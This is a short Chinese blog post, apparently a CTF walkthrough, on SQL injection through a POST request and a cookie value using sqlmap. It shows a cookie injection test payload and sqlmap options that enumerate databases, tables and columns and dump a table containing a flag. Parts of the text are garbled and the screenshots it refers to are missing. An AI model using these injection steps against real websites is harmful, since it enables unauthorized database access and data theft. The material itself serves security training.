sqlmap的post注入

Ŀ¼

1. sqlmap的POST注入
2. cookie注入暴数据库

---

POST注入

cookie：user=admin"flag参数

验证Cookie: user=admin’ and ‘1’=1’flag，说明这种情况就存在注入

>>这里是修改cookie后进行注入的，那么要结合cookie注入来看post注入的原理，其实两个是要联合进行注入的，互不影响。

cookie注入

1.暴数据库

>>可以看到有四个数据库

POST文件1.txt这里要写文件位置如：/root/1.txt

cookie要写成：--cookie="user=admin"

指定数据库类型：--dbms=mysql

暴数据库：--dbs

2.猜表

>>猜出employee数据库下有三个表

猜表：--tables

其它的参数不变

3.表fllaagg中的列

猜列：--columns

4.猜表中的字段

>>找到包含flag的字段

猜字段：--dump

来源：博客园

作者：请叫我阿毛

链接：https://www.cnblogs.com/loopkep/p/11406765.html